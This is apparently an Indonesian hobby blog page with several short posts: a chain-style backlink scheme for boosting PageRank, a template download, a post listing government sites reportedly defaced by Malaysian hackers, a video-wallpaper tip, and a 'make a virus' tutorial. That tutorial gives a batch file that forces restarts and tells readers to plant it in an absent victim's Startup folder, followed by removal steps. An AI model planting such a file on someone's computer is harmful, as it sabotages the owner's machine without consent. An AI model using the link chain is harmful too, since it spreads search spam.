Cara cepat menaikkan Page Rank Blog



Page rank dan traffic blog, merupakan dua hal yang menjadi incaran para blogger. Khususnya blogger baru seperti Saya ini. Berbagai cara cepat dan instan untuk meningkatkan page rank dan traffic blog selalu cara yang paling di cari-cari. Sekali lagi, saya akan berbagi pengalaman kepada anda mengenai cara cepat meningkatkan page rank dan traffic blog hanya dalam satu cara.

Cara cepat meningkatkan page rank dan traffic blog, hanya diperuntukkan bagi anda yang menginginkan page rank dan traffik blog secara instan. Cara cepat meningkatkan page rank dan traffic blog adalah dengan cara penyebaran link menggunakan sistem Multi Level Marketing? Untuk tips kali ini saya mau mencoba mengajak anda semua untuk memanfaatkan kedahsyatan faktor kali dan kecepatan penyebaran ini dalam bentuk backlink.

Cara Cepat Meningkatkan Page Rank Dan Traffic Blog ternyata cukup mudah. Yang perlu anda lakukan adalah meletakkan link-link berikut ini di blog atau artikel atau silahkan langsung COPAS (copy Paste) artikel ini.

1. Whiteball(Duniakomputer)

2. Intuisiblog

3. SEOjaguars

4. Iklan baris

5. Ki Dukun

6. Blogobusiness

7. Rosandika

8. Brojomusti

9. Zona Tutorial Blog

10. Zona Review Blog

11.Zona Tutorial Bisnis

12.Ilmu

13.Sang Pengawas

14.Gendhogo Al-Ikhlas

15.Gema Hati

16.Blogger Indonesia

17.SEO macan

18.Pakde SEO

19.Intuisi

20.Optimalkan Indera Keenam

21.Seputar bisnis Online

22.Business 4 U

23.Anugrah Ilahi


Cara Kerja, pertama-tama anda meletakkan link blog anda beserta anchor text seperti susunan diatas, kemudian anda hapus nomer urut ke 23 dari daftar, sehingga semua peserta naik 1 level.Yang semula berada di nomor 1 jadi nomor 2, nomor 2 jadi 3, dst. Kemudian masukkan link blog anda di posisi nomer satu (1) atau paling atas sendiri.

Jika tiap peserta mampu mengajak 5 orang saja, maka jumlah backlink yang akan didapat adalah

Ketika posisi blog anda 1, jumlah backlink = 1
Posisi 2, jml backlink = 5
Posisi 3, jml backlink = 25
Posisi 4, jml backlink = 125
Posisi 5, jml backlink = 625
Posisi 6, jml backlink = 3,125
Posisi 7, jml backlink = 15,625
Posisi 8, jml backlink = 78,125
Posisi 9, jml backlink = 390,625
Posisi 10, jml backlink = 1,953,125
dst.

Jika anda memasang sampai posisi 10 saja, dan semuanya menggunakan kata kunci (anchor text) yang anda inginkan. Dari sisi SEO, anda sudah mendapatkan 1,953,125 backlink dan efek sampingnya jika pengunjung web para downline anda mengklik link itu, otomatis blog anda akan mendapat tambahan traffic.

Nah, silahkan copy paste artikel Cara Cepat Meningkatkan Page Rank Dan Traffic Blog, dan hilangkan peserta nomor 23 lalu tambahkan link blog/website anda di posisi 1. Ingat, anda harus mulai dari posisi 1 agar hasilnya maksimal.

Selamat mencoba Cara Cepat Meningkatkan Page Rank Dan Traffic Blog

Baca Selengkapnya

Free Download Template Blog Transparan | Bagus

Template TrasparanNahh...kali ini ane akan bagi-bagi template blog transparan. dulu ane sempet pakek ni template tapi bosen dan nyarik template dengan design yang berbeda untuk blog ane. template ini dibuat oleh Mr. Devil Code, Master Hacker dari jogja. Bagi yang pengen nyobak ni template silakan





Untuk download Template :

Disini

Untuk demo templatenya silakan liat :

Disini


Dijamin Ngx Bakal Nyesel
:)

Semoga Bermanfaat




Baca Selengkapnya

TUGAS PEMROGRAMAN BERORIENTASI OBJEK

Untuk Melihat Makalah Kami Silakan Klik


Disini
Baca Selengkapnya

Situs Indonesia DiHack Malaysia



Hacker Malaysia


Setelah ratusan situs Malaysia di hack oleh hacker indonesia. sekarang giliran situs indonesia yang dijebol oleh malasya. Uniknya lagi mereka ingin mengadu domba kita. terliha pada tulisan

Thtanks to: XShimeX | Zuanbijai | -S y m p h o e n i X- Clanz

Nama yang berwarna merah tersebut adalah hecker indonesia yang sering menghack situs malasya, asumsinya pihak malaysia ingin mengadu domba kita agar terjadi kesalah pahaman antar hacker indonesia

berikut situs yang di hack oleh malasiya :

http://perencanaan.esdm.go.id/


http://www.komisihukum.go.id/


http://www.semarangkab.go.id/


http://www.jakarta.go.id/jakarta/


http://rb.bppt.go.id/


http://www.marinir.mil.id/malaysia.html


http://sub.kemenpora.go.id/subberita


http://www.marinir.mil.id/malaysia.html

Yang jelas situs Malasiya lebih banyak yang kita Hack, karna teknologi kita masih jauh di atas Malaisya. :)






HIDUP INDONESIA,........................ TUNJUKAN MERAH PUTIHMU
Baca Selengkapnya

Cara Mudah Membuat Virus Komputer

Cara Membuat Virus Mudah
kali ini ane akan ngasi tips bagaimana cara membuat virus yang bisa ngerstart komputer, pada saat komputer dihidupkan, sebenernya cara ini hanyalah untuk iseng-isengan dan menurut ane cara paling Cupu, karna jika ingin menginfeksi komputer korban, kita harus melakukannya secara manual. ya.... lumayan untuk jailin orang...hehehe :)
sebelumnya ane mau minta ijin dulu buat master", buat posting artikel ini...




Pertama-tama buka Notepad dan Copas kode di bahah ini

@echo off
shutdown -r -t 1

kemudia Save as dengan Format Bat
misalkan iseng.BAT, jangal lupa pilih all files pada save as type

nah......kita sekarang sudah selesai membuat virusCupu ini, selanjutnya tinggal cari komputer korban.

cara menginfeksikan ke komputer korban
lihat SIKON, bila si pemilik komputer/Laptop sedang pergi. silakan lakukan kejailan ente
Copy file virus yang baru ente buat, dan paste di START-->all programs-->Startup

maka pada saat komputer yang baru ente infeksi tadi direstart,dengan otomatis komputer akan melakukan restart pada saat Startup secara terus menerus, kecuali komputer korman di shut down paksa.

Cara Menghilangkan Virus.CUPU
Pada saat komputer booting tekan terus f8, pilih Safe Mode
ente tinggal hapus file virus yang barusan ente taruh di
START-->all programs-->Startup
maka komputer akan berheni restart sendiri


Note:Penulis tidak bertanggung jawab jika ada kerusakan pada komputer yang sudah terinpeksi, dan jangan gunak cara ini untuk kejahatan





Baca Selengkapnya

Membuat Video Menjadi Background Destop

Membuat Video Menjadi Background

Kali ini ane akan ngasi Trik bagaimana membuat video yang kita miliki bisa dijadikan background Destop, yang nantinya agan memperindah tampilan background Destop yang kita miliki. Cara ini sangatlah mudah hanya merubah Format video agar bisa dijadikan background destop.
Ok langsung aja kita mulai , supaya ngax kebanyakan basa-basi :)






install DreamScene terlebih dahulu, ente bisa download programnya diSini

1. selanjutnya ente harus ngerubah vormat video menjadi WMV dengan tool seperti Format Factory
2. Usahakan resolusi video tinggi ,agar Video tidak menjadi pecah-pecah saat dijadikan backgroud Destop
3. Jika sudah tinggal Atur Video tadi menjadi backgroud destop dengan cara seperti ente mengubah bacgroud destop biasa..:)
4.Dan lihat hasilnya...video tadi menjadi background destop. seakan destop anda menjadi hidup...

Mudah bukan..hehe...akhir kata semoga tutorial ini bermanfaat
sampai ketemu di tutorial selanjutnya...:)

Baca Selengkapnya
 

Whiteball Triks Copyright © 2012 | Template design by O Pregador | Powered by Blogger Templates